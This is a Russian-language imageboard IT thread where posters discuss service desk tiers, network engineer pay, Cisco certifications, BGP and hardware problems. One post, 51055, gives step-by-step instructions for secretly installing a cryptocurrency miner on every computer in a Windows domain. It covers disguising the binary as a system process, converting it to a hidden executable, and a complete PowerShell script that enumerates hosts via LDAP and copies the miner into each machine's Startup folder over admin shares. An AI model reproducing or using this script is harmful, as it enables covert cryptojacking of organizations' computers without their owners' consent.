IT-тред #74 - Работа и карьера

>Чтобы это работало, нужно отключать к хуям телефоны отдела.

Либо посадить хотя бы одного двух человек на прием заявок. При этом тикеты должны создаваться автоматически при поступлении входящего звонка на определенный номер.

Ответы50132

13 дек, 16:06 46 1150132

>Это не работает. Пытались внедрять уже два раза

Ну это значит, что ты не работал в нормальном сервис деске
>>50115
ага

Суть в том, чтобы делать линии обороны:
От много людей с малой квалификации на обезьяний труд до супер спецов, пример

Первая линия (приём и эскалация заявок, простейшие решения уровня перезагрузите)
Вторая линия (сетевики без сертификатов, которые перезагружают интерфейс, могут назначить ИП адрес, пару виндовс макак с делегированными правами в АД, чтобы добавлять группы)
Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка)

По ITIL:

У тебя есть ВХОДНЫЕ ДАННЫЕ > Процесс (с вечной оптимизацией по SLA и KPI+KGI) > выход
все стандартные процессы, которые имеют свойство повторения больше 3-5 раз должны быть описаны и найден кратчайший путь выполнения, например

ВХОД: НУЖЕН ПРЕДОСТАВИТЬ ДОСТУП К ПОЧТЕ ДЛЯ ЧТЕНИЯ ЧУЖОГО ЯЩИКА
ПРОЦЕСС: ЭСКАЛИРОВАНИЕ НА СОГЛАСОВАНИЕ РУКОВОДИТЕЛЯ/ДИРЕКТОРА -> ПЕРЕНОС НА ГРУППУ АДМИНОВ -> ВЫПОЛНЕНИЕ
ВЫХОД: РЕЗУЛЬТАТ

Оптимизация, пример: отказаться от согласования для почты сотрудников ниже 5 грейда (ниже чем главные по тарелочкам)

Ну и всё в таком духе

https://www.youtube.com/watch?v=9ntALPk2fTE

Вообще ты бы поинтересовался вопросм, если не хочешь постоянно топтаться в одном болоте

13 дек, 16:06 46 1150132

>Это не работает. Пытались внедрять уже два раза

Ответы50138

13 дек, 16:10 47 1150138

>>50132

>Вторая линия (сетевики без сертификатов, которые перезагружают интерфейс, могут назначить ИП адрес, пару виндовс макак с делегированными правами в АД, чтобы добавлять группы)

Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка)
Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями

Ответы50153 60023

13 дек, 16:31 48 1150153

>>50138

>Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями

В Infosystem JET, правда я там пара лет как уже не работаю

Ответы50156 50157

13 дек, 16:34 49 1150156

>>50153

>В Infosystem JET, правда я там пара лет как уже не работаю

По подробнее.
Как-то метил туда. Ну и в другие интеграторы.
Мне всегда казалось, что я там буду писать эти всяческие ПЗ, ТКП и другие аббревиатуры в большей степени, а не сетями заниматься.
Документацией, короче говоря.

Да и денег мало платят. Меньше, чем в среднем энтерпрайзе. Думаю сейчас 90-100 на руки в Джете — стандарт. А то и меньше. И в серую.

Ответы50163

13 дек, 16:35 50 1150157

>>50153

>правда я там пара лет как уже не работаю

и почему ушел? И куда? В дургой интегратор или как? И если н5е в интегратор, то почему не в интегратор.

Ответы50163

13 дек, 16:41 51 1150163

>>50156

>умаю сейчас 90-100 на руки в Джете

Друг там CCNA у него 90к, сейчас вся ЗП белая, ещё в 2013 сделали белой, хотя ты прав, ниже чем по рынку, но нивелируют прочими плюхами: 3 дня в месяц без объяснения и справок (у нас все не ходили по пятницам, пидоры), свой врач и массажист, раньше был ДМС, премии, любая переработка = 1% от зп в час, то есть отработал в выходные смену 12 часов, получил 100% зп + 12% за один день, я когда работал брал себе все субботы, получал по 36-48% сверху. Когда я был не смотрели на опоздания, как пришёл, так пришёл, как ушёл так и ушёл, но работу делай

>>50157
Ушёл в небольшую контору начальником ИТ отдела, так как из техпода предложили делать в одной фирме с ноля и сразу начальником, и не жалею, опыта получил очень много причём не только манагерского, получил хорошие знакомства у разных вендоров взяточки, откатики с партнёрскими программами и скидками, короче не жалею

Ответы50168 50171

129 Кб, 900x600

13 дек, 16:46 52 1150165

Посоветуйте, например.
Отучился в вузике на инженера-системотехника, после 3 года работал на заводе инженером хуйни. Сейчас планирую опять вкатиться в ИТ по специальности: системным аналитиком или аналитиком данных, sql или что-то подобное.
Что чаще спрашивают на собеседовании? Что подучить? Куда посоветуете идти?

13 дек, 16:50 53 1150168

>>50163

>Друг там CCNA у него 90к

что значит CCNA в данном контексте.
Я, наприме, CCNP. Но ты же понимаешь, что можно быть CCNP и даже CCIE, но ничерта не знать.
А можно вообще не сдавать на сертификаты, но быть гуру.

Ответы50179

13 дек, 16:51 54 1150171

>>50163
И да, это отдел какой?
Там есть сервисный центр, есть какие-то проектанты, не помню уже как называется. Сетевики там отдельно. Те, кто серверами занимается, тоже отдельно. Не помню уже аббпревиатуры.

Ответы50179

13 дек, 17:01 55 1150179

>>50168

> CCNP и даже CCIE, но ничерта не знать

Кстати, не видел таких, это которые дампают вопросы или пользуются багом сворачивания вопросов? Просто помню видео было такое, когда какой-то хуй сворачивает вопросы и смотрит ответы в интернете прямо на экзамене
Друг занимается уже готовой сетью, которое построило более высокое подразделение, сейчас, насколько я знаю, занимается и изменениями, но первоначальная сеть была не его
Насколько знаю На уровнях агрегации и доступа, про ядро не уверен.
Вот ребята которые строили сеть и более высокие сетевики, кстати там был парень с реальным знанием CCNP и даже без CCNA, но был в огромном почёте, занимаются только ядром и агрегацией до уровня доступа они уже не опускались почти никогда, и занимались проектированием сетей и подобными делами, хотя я был виндузовым админом и особо не лез в их работу

>>50171
бля, я этого тоже не помню, это было сто лет назад, мы звали их сетевики, просто "кинь на сетевиков" и всё, они и в СД были как "сетевые инженеры" и что-то такое

Ответы50293

13 дек, 17:03 56 1150180

Ответы50300 50308 50311 50319

>ИТИЛ

метил

Ответы50185 50225

13 дек, 17:06 57 1150185

>>50180
Этил!

13 дек, 17:34 58 1150202

>>49986
>>49987
Спасибо анон, погулял. Правда до Третьяковки не дошёл, устал, завтра может схожу.

13 дек, 18:14 59 1150225

>>50180
организация, запрещённая в РФ

13 дек, 19:55 60 1150293

>>50179

>с реальным знанием CCNP и даже без CCNA, но был в огромном почёте

>занимаются только ядром и агрегацией

Почему все дрочат на CCNP, это же изи выучить и сдать. С дампами так вообще за пару месяцев решается. Охуеть ядро и агрегация. Чего там есть сложного вообще? Если это не провайдер, то это работа для джамшута.

13 дек, 20:06 61 1150300

>>50293
Речь идёт о уровне знаний, те кто знаком с сертификацией сразу понимают о каком уровне идёт речь. Есть сертификат или нет без разницы. Просто это такой разговорный уровень для общения. Я например считаю что я близок к этому уровню знаний, а сдавать не хочу, жду когда они трек обновят.

13 дек, 20:07 62 1150308

>>50293

>

>Почему все дрочат на CCNP, это же изи выучить и сдать.

Никто не дрочит на CCNP.
Более того, на CCIE никто тоже не дрочит.
Когда говорят CCAN|NP|IE, имеют ввиду тот перечень навыков, знаний и опыт работы, который предполагается знать человеку с соответствующим сертификатом. Имеют ввиду "знания на уровне..."

13 дек, 20:09 63 1150311

>>50293
А насчет ядра и агрегации согласен. Работа для джамшута. Как и всё админство. Sad but true.
То ИТ, которым действительно надо заниматься, не имеет ничего общего с администрированием, веб-макакингом и кодингом.

Ответы50323

13 дек, 20:15 64 1150319

>>50293

> Охуеть ядро и агрегация

Ну под ядром в крупной компании подразумевается не администрирование коммутаторов ядра, а вся центральная инфраструктура. Всё то железо, на которое завязаны все сервисы компании. Например, под этим подразумевается знание того, как и почему стек коммутаторов 4500-Х подключен к площадке Х, как и зачем подключены роутеры, которые терминируют туннели филиалов, партнеров и черт еще чего. Коммутации ЦОДа компании тоже относиться к т.н. "ядру" я бы сказал.
А само ядро кампусной сети....ну тут да, действительно. Но картина в целом выглядит уже сложнее.

Ответы50390

13 дек, 20:18 65 1150323

>>50311

>не имеет ничего общего с администрированием, веб-макакингом и кодингом.

это всё уровень техникума, Проф Тех Училища.

Ответы50328

13 дек, 20:26 66 1150328

>>50323
Сейчас набегут днари, которые четыре года грызли матан в вузе, но вкатиться смогли только в веб-программирование.

13 дек, 20:40 67 1150347

Расскажите про Ланит, что из себя представляет, каково работать там, как платят.
Также интересует GDC в Казани который, в инторнете про них хорошего мало пишут.

Ответы50371 50487

13 дек, 21:12 68 1150371

>>50347
GDC ничего так, раньше было лучше, сейчас неплохо.

13 дек, 21:45 69 1150386

>>50091
Ты из ДС? У нас есть позиция, где как раз нужен джун линуксоид

13 дек, 21:53 70 1150390

>>50319

>Всё то железо, на которое завязаны все сервисы компании

>как и зачем подключены роутеры, которые терминируют туннели филиалов

В розетку подключены, чтобы нагревать воздух. Тунели уже школьники с компов делают безо всяких кошек.

На сетевое железо сервисы обычно завязаны примерно как на электросеть. В компаниях до 1000 рабочих мест можно всё выкинуть и заново настроить за 24 часа силами одного двух макак. Если компания большая, то макак нужно больше. Откуда ЗП по 100к у сетевых инженеров я не понимаю.

Ответы50392

13 дек, 21:58 71 1150392

>>50390

>Откуда ЗП по 100к у сетевых инженеров я не понимаю.

пффф так 100к это обычная з.п. в том то и дело.

Ответы50394

13 дек, 22:04 72 1150394

>>50392

>так 100к это обычная з.п.

Из Калифорнии капчуешь?
Судя по HH это зарплата ведущего разработчика в ДС.

Ответы50401

13 дек, 22:19 73 1150401

>>50394
я в ДС.
Инженер в нефтегазовой компании от 140 тр
Разработчик с опытом от 120 тр.
Хороший годный сетевик с опытом работы в крупной конторе уровня топ-20 банков/ритейл контор это примерно 100 на руки. За 120 можно найти, но придется поискать. За сотку прям устроишься без проблем. Это на руки.
Совокупный доход любого хорошего специалиста в ДС это сотка в месяц полюбому.

Ответы50404 50411

13 дек, 22:23 74 1150404

>>50401
Все у вас там в ДС заебись кроме аренды.. Понту нет на 120 ехать, даже на 150 так себе, тк если тебе 150 платят и ты готов ехать, то чего бы не свинтить за бугор ?

Ответы50408

13 дек, 22:23 75 1150405

то есть сетевики зарабатывают примерно как и все остальные на тех специальностях, на которых нужна какая-то квалификация.
Уровень 60-80 тр на руки в ДС это админы рабочих станций, компьютерная помощь, всякие продаваны телефонов и тому подобное. То есть те работы, где можно относительно легко обучить почти любого за приемлемый срок.

13 дек, 22:25 76 1150408

>>50404
кому ты там за бугром нужен — русский Ваня — без гражданства, языка и опыта работы?!
Ты что думаешь там своих что ли нет сетевиков/кодеров/админов/любая другая профессия?
Если ты талант и самородок — это одно! Но таким у нас тоже сладко живется. В яндексах датамайнингом каким-нибудь за 200к заниматься.

Ответы50419 52271

13 дек, 22:27 77 1150411

>>50401

>Инженер в нефтегазовой компании от 140 тр

Сколько у нас нефтегазовых компаний? В газпроме, ты хотел сказать?

>в крупной конторе уровня топ-20 банков/ритейл контор это примерно 100 на руки

В РФ 300+ CCIE. Это по 10 на топ20 банков и ритейл контор. А ещё есть 9000+ CCNP и все они получают 100+. 100к даже для ДС не "обычная зп".

Ответы50412 50413 50414 50417

13 дек, 22:33 78 1150412

>>50411
Не, не газпром. Новатэк. Это газовая контора. Инженер-проектировщик опытный 150-200к. Лично общался с HR. Но это выпускники ТОп ВУЗа РГУ Нефти и Газа с богатым опытом.

Еще есть вендоры и интеграторы. Там платят побольше, чем 100. Но там уже за администрирование, а за пресейл, проектирование и тома подобное.

13 дек, 22:34 79 1150413

>>50411
Как по мне, человеку, который обладает кругозором CCIE в банке делать нечего.

13 дек, 22:35 80 1150414

>>50411
Говорю же, 100к для ДС для любого специалиста с опытом на работе, требующей квалификация, это уже стандарт.

13 дек, 22:39 81 1150417

>>50411
Кстати, насчет зарплат. Есть же еще всякие PwC, KPMG, инвестбанкинг или как его там. Где трудятся успешные выпускники МГУ, ВШЭ и других ВУЗов из ТОП-5. Всякие консультанты BI и прочей другой херни. Там там вообще поржали бы над зарплатой в 100к. Там 100к платят стажеру. Правда хер попадешь туда и работать надо. Это не циски настраивать и групповые политики пердолить

382 Кб, 940x901

13 дек, 22:40 82 1150419

>>50408

Жалко что ты английский не учил

Ответы50489

13 дек, 23:39 83 1150443

Вштал тут вопрош про покупку ажно целой AS для нашей компании. Я уж не знаю, чем там руководствовались топы, суть короче в том, что реализовывать всё это в конечном итоге будет Вася из ИТ. То есть я.
Собственно, мне нужны аргументы против регистрации AS.
Структура межсайтовых связей - классическая звезда VPN с ЦО в центре и филиалами/ЦОДами на лучах. По договору с разными провайдерами на каждый линк в интернет.
До этого я с BGP никогда не работал, всё пидорение сетей ограничивалось нашей внутренней AS на OSPF. Когда таки покурил пару недель различные статьи по теме понял, что так нихуя и не понял, как будут анонсироваться в интернеты линки от филиалов. Если в OSPF можно указать, что такая-то /30 подсеть из сети /28 будет анонсироваться туда-то, а другая /30 подсеть туда анонсироваться не будет. В BGP же, как я понял, анонсы во внешний мир хуярятся сразу с минимальным префиксом /24 и при том одновременно со всех наших шлюзов ведущих в Интернет.
/tl;dr/
Наверно криво объясняю, так как с терминологией не освоился ещё, да и понимание предметной области пока мутное. Короч, что я имею ввиду:
Допустим, есть у нас ЦО в Москве и филиал Чите. Их шлюзам присвоены адреса из одного и того же блока одной и той же BGP AS, к примеру, 2.2.2.0/24. У Москвы 2.2.2.1, у Читы 2.2.2.200. LAN ЦО и филиала связаны через VPN по общедоступным каналам связи; никакой своей кабельной сети между филиалом и ЦО нет.
Ну и вот, допустим, какой-то клиент из Читы решает получить доступ к официальному сайту компании, который хостится по московскому адресу 2.2.2.1. Как пойдёт пакет? Из того, что я понял, он придёт в сеть провайдера, там провайдер увидит, что данный IP пункта назначения относится к известной BGP AS, посмотрит в таблицу маршрутизации, и увидит, что ближайший к нему шлюз в эту AS находится по адресу 2.2.2.200, после чего смаршрутизирует туда пакет и... всё пойдёт прахом, потому что своей собственной кабельной структуры у нашей компании нет, а VPN быть может вообще не настроен на то, чтобы перенаправлять такую-то хуйню о внешние интернеты. Ну или там стоит сраный ЛинкСис, который вообще охуеет с такого напора.
Или я не прав?
/tl;dr Х2/
Как, короче, отдельно анонсировать префиксы /30 или /32, входящие в выделенную нам подсеть, чтобы при этом на нас весь мир не орал матом, дескать, какого хуя вы раздуваете Full View?

13 дек, 23:39 83 1150443

Ответы50444 50459 50504

13 дек, 23:40 84 1150444

>>50443

>входящие в выделенную нам подсеть

входящие в выделенный нам блок
Быстрофикс

14 дек, 00:18 85 1150459

>>50443
У тебя тоже 100к зп?

Ответы50476

14 дек, 01:05 86 1150476

>>50459
Эээ, нет. 27К + двойной оклад на руки за переработки в выходные и праздники.

14 дек, 01:20 87 1150487

>>50347
GDC, или по-татарски Айсиэл сервисез, это галера. Будешь на аутсорсе обслуживать европейских заказчиков. Зарплаты средние для замкадья, причем в других подразделениях ICL (типа СТ) за те же знания и опыт можно получать больше.

Ответы51164

14 дек, 01:26 88 1150489

>>50419
Мда... Вся жизнь в одной картинке.

14 дек, 07:19 89 1150504

>>50443
Я что-то не понял зачем тебе в филиалах компании твои провайдеронезависимые адреса?
У нас BGP с цоде, анонсируем свои PI на двух провайдеров. Все просто, схема стандартная, настройка базовая. Ничего сложного нет.
Гугли BGP для двух провайдеров, мануалов куча.

14 дек, 09:27 90 1150521

Если просят проголосовать организацию на каком-нибудь сайте получается проголосовать единожды. Я ж правильно понимаю, что там проверка айпишника и невозможно сделать так чтобы каждый сотрудник проголосовал с рабочего места?

Ответы50523

14 дек, 09:39 91 1150523

>>50521

>проверка айпишника

Ничего это не значит, может быть он записывает результат по куки, а не по IP, как люди с серыми IP голосуют, а 1 голос по IP - это безумие

Ответы50524

14 дек, 09:56 92 1150524

>>50523
Ну я просто столкнулся с такой проблемой, что не могут люди из нашей сети голосовать. Один проголосовал, а всем другим пишут, что вы уже проголосовали - хватит. Могу я как-то это разрешить?

>по куки

Дык я бы тогда мог куки стереть и ещё голосовать. Почему тогда другим компам в сети запрещает?

Ответы50530

14 дек, 10:02 93 1150526

У меня вот вопрос. Вам удается читать литературу на работе?Или дома?И нормально ли у вас усваивается инфа если по сути приходишь домой в 7-7-30,до 8 ужинаешь а потом до 10 занимаешься?

Ответы50529 50595

14 дек, 10:11 94 1150529

>>50526

>У меня вот вопрос. Вам удается читать литературу на работе?

только на работе этим занимаюсь, дома редко.
На работе всеглда есть время на чтение литературы и проделывания всяких лаб в EVE-NG

Ответы50532 50540

14 дек, 10:13 95 1150530

>>50524
Ну у них значит по IP - это тупо

Абу банит по куки, перманентом на сутки, например, когда твой же браузер в режиме инкогнито работает

14 дек, 10:14 96 1150532

>>50529
Я пытаюсь что-то делать по вечерам,но голове уже тяжело после рабочего дня.На работе к сожалению времени нет. Надеюсь когда-нибудь появится такая работа с возможностью уделять хотя бы полтора часа в день на самообразование.

14 дек, 10:41 97 1150540

>>50529
О, а я сейчас пакет трейсер мучаю, а когда есть время катаю пару каточек в овервотч, и снова в пакет трейсер работаю админом

Ответы50587

14 дек, 12:15 98 1150587

>>50540
на работе или дома лол? )

Ответы50599

14 дек, 12:24 99 1150595

>>50526

> У меня вот вопрос. Вам удается читать литературу на работе?Или дома?И нормально ли у вас усваивается инфа если по сути приходишь домой в 7-7-30,до 8 ужинаешь а потом до 10 занимаешься?

Попытки заниматься этим дома после работы длительное время быстро проведут тебя к проф выгоранию.

14 дек, 12:34 100 1150599

>>50587
На работе, дома я не могу, дома я занят

14 дек, 12:44 101 1150605

Как можно с минимумом затрат сделать переадресацию с одного телефона на другой? Телефоны обычные аналоговые и функции они такой не поддерживают. Линии разные.

Ответы50607

14 дек, 12:46 102 1150607

>>50605
https://help.mgts.ru/home/phone/forwarding/

Кто оператор? Туда и вопросы, вопрос в поддержке АТСа

14 дек, 22:44 103 1150902

фух, переименовали

63 Кб, 500x752

15 дек, 09:37 104 1151042

Сетевики, а как мой провайдер организует работу интернета у меня дома, у меня нет привязки по маку, пппое, или ещё какой говнины, я просто втыкаю провод и получаю интернет с белым IP по DHCP от провайдера

Ответы51077 51088

403 Кб, 648x807

15 дек, 10:46 105 1151055

Катал это всё для /cc/, о том как заразить ПК в домене майнером, что бы не зря катал вброшу сюда, может кому-то понадобится:

1 качаешь консольный майнер майнергейта, его так как не детектируется антивирусом: https://minergate.com/downloads/console
2. переименовываешь его .exe в что-то более-менее похожее на процесс винды, например system86
3. создаешь батник загрузки майнера и пишешь туда: "system86 -user youremail@account -xmr 1", где -xmr, то что майним, цифра "1" - потоки процессора, ты сказал про 80%, вот если у тебя 4 ядра, то бери цифру 3, ну сам подгонишь system86 -имя твоего переименованного exe файла
4. чтобы не палиться качаешь прогу, называется bat to exe, и конверитурешь свой bat в СКРЫТЫЙ exe файл без ГУИ
5. создаёшь ярлык для автозапуска файла при старте системы, назови его также system86.lnk, в нём указывай путь на скрытый ехе "C:\ProgramData\system86\test.exe"
6. создаём сетевую папку с правами "чтение для всех", папка будет, например "\\SMBshara\miner\"и кидаем туда наш ярлык и папку с майнером
7. Я уже постарался и сделал скрипт для разливки на ПК в домене:
#начало мы выгружаем все ПК из OU
$ErrorActionPreference = "SilentlyContinue"
$strCategory = "computer"
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = "LDAP://OU=SERVERS,DC=COMPANY,DC=local"
$objSearcher.Filter = ("(objectCategory=$strCategory)")
$colProplist = "name"
foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
$colResults = $objSearcher.FindAll()
#тут мы перебираем все ПК по циклу пк1-пк2-пк3 итд
foreach ($objResult in $colResults)
{
$objComputer = $objResult.Properties
$objComputer.name
#тут мы задаём пути КУДА скопировать майнер, я бы не брал папку windows так как из неё нихера не запускается
$path1="\\"+$objComputer.name+"\C$\ProgramData\system86"
#эта папка АВТОЗАГРУЗКИ для всех пользователей windows, запускается при старте системы
$path2="\\"+$objComputer.name+"\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
#тут мы показываем что и куда копировать
Copy-Item -ErrorAction SilentlyContinue -Path "\\SMBshara\miner\system86\" -Destination "$path1" -Recurse
Copy-Item -ErrorAction SilentlyContinue "\\SMBshara\miner\system86.lnk" -Destination "$path2"
}
Ну без прав админа ты не сможешь это разлить удалённом, можешь конечно кидать руками

403 Кб, 648x807

15 дек, 10:46 105 1151055

Ответы51566 51965 52301 60044

15 дек, 12:05 106 1151077

>>51042
Вариант 1: ты доплачиваешь провайдеру 50₽ в месяц за белый IP, просто не знаешь об этом.
Вариант 2: твой IP не совсем белый.

Ответы51084

15 дек, 12:15 107 1151084

>>51077
Да, белый, белый, доступен из внешнего мира
Вопрос не про IP, а про то какими средствами и как он это реализует, без привязок и прочей хуйни

Ответы51086

15 дек, 12:22 108 1151086

>>51084

> Да, белый, белый, доступен из внешнего мира

> Вопрос не про IP, а про то какими средствами и как он это реализует, без привязок и прочей хуйни

Dhcp option 82 вроде бы. Передаёт на dhcp сервер идентификатор коммутатора и номер порта.

Ответы51098

15 дек, 12:23 109 1151088

>>51042
IPoE

Ответы51098

15 дек, 12:42 110 1151098

>>51088
>>51086
https://habrahabr.ru/post/108453/

Во, нашёл, отлично

15 дек, 14:19 111 1151149

У меня два вопроса про IP-KVM (IPMI, Supermicro, на понты денег нет).
1. Там есть интеграция с Active Directory, точно есть. А Single Sign On работает? //Это я и сам могу проверить, но если кто знает - хорошо, меньше глупых и бесплодных попыток.
2. Предположим, привезли новый, чистый, голый сервер. Нам известны его GUID, MAC-адреса каждой сетевой карты, включая KVM-ную. Все. В принципе, достаточно. Адреса со всеми настройками сети выдать везде, в т.ч. на KVM-порту - не вопрос. Установить ОС как надо, из шаблона и с Desired State Configuration по сети - не вопрос. А автоматизировать настройку всякой херни, включая доменную авторизацию пользователей IPMI - можно? //Это я проверить не могу, не на чем. Не сносить же один из серваков подчистую для дурацкого эксперимента? Так, на будущее интересуюсь.

Ответы51181

15 дек, 14:43 112 1151164

>>50487

>Будешь на аутсорсе обслуживать европейских заказчиков.

Это охуенно же. Богатая инфраструктура с нормальными серверами и оборудованием, от сотни до нескольких тысяч серверов у клиентов, десятки тысяч пользователей, иностранные коллеги, прокачиваешь английский, командировки в Европу.

> ...

> эмигрируешь

> PROFIT

Ответы51168 51169

15 дек, 14:54 113 1151168

>>51164
Правда скучновато, я понимаю, что российский маня бизнес - это хуёво, но только в рашке у нас и линукс и сети и виндувс и БД и всё делает один человек, а в Европе под каждый пук отдельный

Ответы51169

15 дек, 14:56 114 1151169

>>51164
>>51168

>только в рашке у нас и линукс и сети и виндувс и БД и всё делает один человек

В любой мало мальски крупной компании не так.

Ответы51173

15 дек, 14:58 115 1151173

>>51169

>мальски крупной компании не так.

Знаю, но не всегда, в конторе из 5-6 ойтишников на 500 человек (что считается нормой) будет 3-4 эникея и 2-3 Шивы, которые будут делать всё
Работаю в ИБ в конторе с 6к пользователей, так я и линукса настраиваю и энтерпрайз админ, и запросы к ексчейндж пишу на повершелл, в общем тоже Шива

Ответы51176

15 дек, 15:02 116 1151176

>>51173

>Работаю в ИБ в конторе с 6к пользователей так я и линукса настраиваю и энтерпрайз админ, и запросы к ексчейндж пишу на повершелл, в общем тоже Шива

это очень странное положение вещей.
У нас ИБ это ИБ, виндоадмины это виндоадмины, сетевики это сентевики, телефонисты тоже отдельно.
эникеи отдельно. Базы данных отдельно. Разработка отдельно.

Ответы51186

15 дек, 15:11 117 1151181

>>51149

>А автоматизировать настройку всякой херни

>Адреса со всеми настройками сети выдать везде, в т.ч. на KVM

This. Раз адрес выдается, а не вписывается, он тебе известен. Дальше командуй ему че хошь с дефолтным паролем.

15 дек, 15:18 118 1151186

>>51176
У нас также, но когда ты оказываешься более квалифицированным, чем отдел линуксойдов у аутсорса, то невольно начинаешь делать сам, аналогично с виндой, я могу написать скрипт на повершелл сам, а могу попросить виндузятника, но в первом случае я понимаю, что я делаю и что получу
Друзья ИБшники такие же, один настраивает циски, имеет CCNA, хотя с знаниями CCNP, а всё ещё тоже безопасник, другой тоже безопасник, а занимается пентестами, и логично занимается хацканьем чужих сетей используя свои знания
Если ваши безопасники только могут катать писули - они тупые

Ответы51191

15 дек, 15:24 119 1151191

>>51186
это те друзья, которым платят по 200 тысяч в месяц?

Ответы51195

15 дек, 15:47 120 1151195

>>51191
Ага

Ответы51199

15 дек, 16:07 121 1151199

>>51195
ну так это получается ты линукса настраиваешь и винду админишь не с подачи руководства, а исходя из того, что тебе самому так хочется, как я понял. А так у тебя есть в конторе и сетевики, и админы.

У нас, например, ИБ только мониторингом занимаются и бумажными делами. Циски и линукса не настраивают и не лезут туда.

Ответы51215

15 дек, 16:28 122 1151215

>>51199

>бумажными делами

Да это пиздец как скучно
И вообще я думаю, что пора бы эту работу уже дропать, так как полное говно

Ответы51218

15 дек, 16:29 123 1151218

>>51215

>И вообще я думаю, что пора бы эту работу уже дропать, так как полное говно

Кем собираешься идти?

Ответы51234

15 дек, 16:55 124 1151234

>>51218
В ойти вернусь, или в ИТ ИБ с пентестами, хацканьем и подобным, может в ITSM подамся, но уж точно сидеть и весь день торговать ебалом в DLP не буду
Плюс ойтишной работы - весело, железки, спуфинг, сидишь как свинья грязный по уши в шеллах, сел в 10 утра, а встал уже за полночь
Плюс манагерской работы - есть свободное время, сказал, что на встречу и съебался по своим делам или домой я так три года на встречи ездил, кек. Построил поддержку, и начал сам себе планы на год рисовать, никто не понимает, какую хуйню ты делаешь, что умные цели, на деле довольно простые, и реализуются по щелчку пальцев, нарисовал время выполнение заявки 30 минут, а на деле там и 2 минутами не пахнет, и снижай по 2-3-4 минуты раз в два года, а всё оптимизация, а потом сделаешь продление сертификата для сайта и почты по акции, А сам пишешь "оптимизация расходов выделяемых на конфиденциальность приватности данных" или вместо ИТ отдел писать "отдел инфраструктуры внутреннего ИТ развития", ох бля, короче я веселился, когда руководил своим ИТ отделом в одной параше, да, может обратно в руководители ИТ отдела попробую податься

Ответы51488

15 дек, 23:50 125 1151445

>>49761 (OP)
В конфу в телеге чет не добавили.

Быстрый вопрос.

Есть публичный ключ ссх. Нужно сделать его сесурно нерабочим, оставив в контенте ключа в начале "ssh-rsa ...."

Рабочий ли вариант "ssh-rsa NOKEY"

Ответы52319

16 дек, 05:03 126 1151488

>>51234
Скоро окажешься у разбитого корыта.
Хотя я считаю что ты просто пиздобол.

Ответы52318

16 дек, 11:04 127 1151529

Есть одна мать. Корпус 2U, охлаждение - кассета из 3-х вентиляторов 80мм. Разъемы 1-4,A,B справа налево, подключены 1,2,A.
Фены 1 и 2 дуют на процы и память, фен А - на чипсет.
Так вот, вентилятор на разъеме 1 не то чтоб вразнос, но крутится на полных оборотах. В то время как вентилятор на разъеме 2 показывает от силы 2000. Есть четыре режима работы.
Full Speed: F1 - 6.9K, F2, FA - 7.1...7.2K
Standard Speed: F1 - 7.1...7.2K, F2 - 2.2K, FA - 3K
Optimal Speed: F1 - 7.2K, F2 - 1.8K, FA - 3.1K
Heavy I/O: F1 - 7.1...7.2K, F2 - 1.6K, FA - 6.1K (ну понятно, за чипсет он один в ответе).
Для сравнения, на втором таком же серваке все трое работают более-менее на равных оборотах. Регуляторы оборотов внутренние. Я только что поменял местами F1 и F2, картина та же, первый разъем на полную, второй сачкует. Нет, подключение кассеты правильное, при изъятии F1 датчик показывал, что изъят именно F1, для F2 - соответственно, F2.
Что может быть? Термодатчик для F2 мозги ебет?

Ответы51538 60044

16 дек, 11:17 128 1151538

>>51529

>Термодатчик

Опять же, температура процов, памяти, чипсета адекватная и на обоих более-менее одинаковая. Так что термодатчик-то в норме, скорее всего.
А как должен вести себя регулятор оборотов, если сигнал от термометра на него не поступает или поступает с помехами? Может, криворукие сборщики при установке кассеты одну из жилок перебили?

16 дек, 12:32 129 1151566

>>51538
Надо будет остановить, да кассету на другие разъемы подключить. Если что-то изменится, значит, с термодатчика лажа идет. Если не изменится - значит, где-то кабель поврежден.

Ответы60044

Аноним 17 дек, 15:23 130 1151965

>>51538
а еще может радиатор не плотно сидит на проце. Проц греется и на фене максимум. Проверить модно тонким слоем термопасты на касание.

Ответы52301 60044

18 дек, 05:00 131 1152271

>>50408
"Кому ты там нужен?" - неправильная постановка вопроса. В России вы тоже не особо кому-то нужны. Чувствуешь в себе силу и уверен в себе - езжай. Вот и все. Если иметь за бугром статус разрешающий работать - безработным не останешься.

Ответы52296

18 дек, 08:05 132 1152296

>>52271

>Если иметь за бугром статус разрешающий работать - безработным не останешься.

Вопрос, откуда ты возьмешь такой статус?

Ответы52299

18 дек, 08:28 133 1152299

>>52296
Канада. Австралия. Можно просто приехать по программе, если заморочиться с подтверждением опыта и сдачей экзаменов по языку. США - пока есть лотерея. Ну и просто рабочие визы и собеседования никто не отменял.

Ответы52312

18 дек, 08:39 134 1152301

>>51965
Может быть. Но а)>>51538

>температура процов, памяти, чипсета адекватная и на обоих (серваках) более-менее одинаковая

Если судить все по той же сводке с датчиков, там 33...35 градусов. Что, в общем, не показатель, температура как раз может и удерживаться только потому что первый фен все время на полных оборотах.
б) Каждый из фенов на "цифровых" разъемах дует сразу на оба проца.
в) Судя по мануалу, в секции "Установка радиаторов" с термопастой экспериментировать вообще запрещено. Так и сказано, мол, пленочку с подошвы сняли - и сразу ставьте, там намазано столько, сколько нужно.

Ответы52549 60044

18 дек, 09:03 135 1152312

>>52299

>Ну и просто рабочие визы и собеседования никто не отменял

Вопрос: ты обладаешь такой квалификацией, чтобы американский работодатель станет заморачиваться ради того, чтобы нанять такого специалиста, как ты? При этом у него будет понимание, что на своем рынке такого специалиста найти сложно. Ответь.

Ответы52928

18 дек, 09:13 136 1152318

>>51488
why?
а ты думаешь, как оно работает, никто на самом деле ничего не знает, процесс выстраивается сам собой за пару месяцев

18 дек, 09:16 137 1152319

>>51445

>сесурно нерабочим

Поясняй вопрос, что это значит
Если это публичный ключ, то нерабочий это значит, что бы его не мог открыть закрытый? То есть достаточно подменить ключ? Но тогда он не будет подписан закрытым ключом.
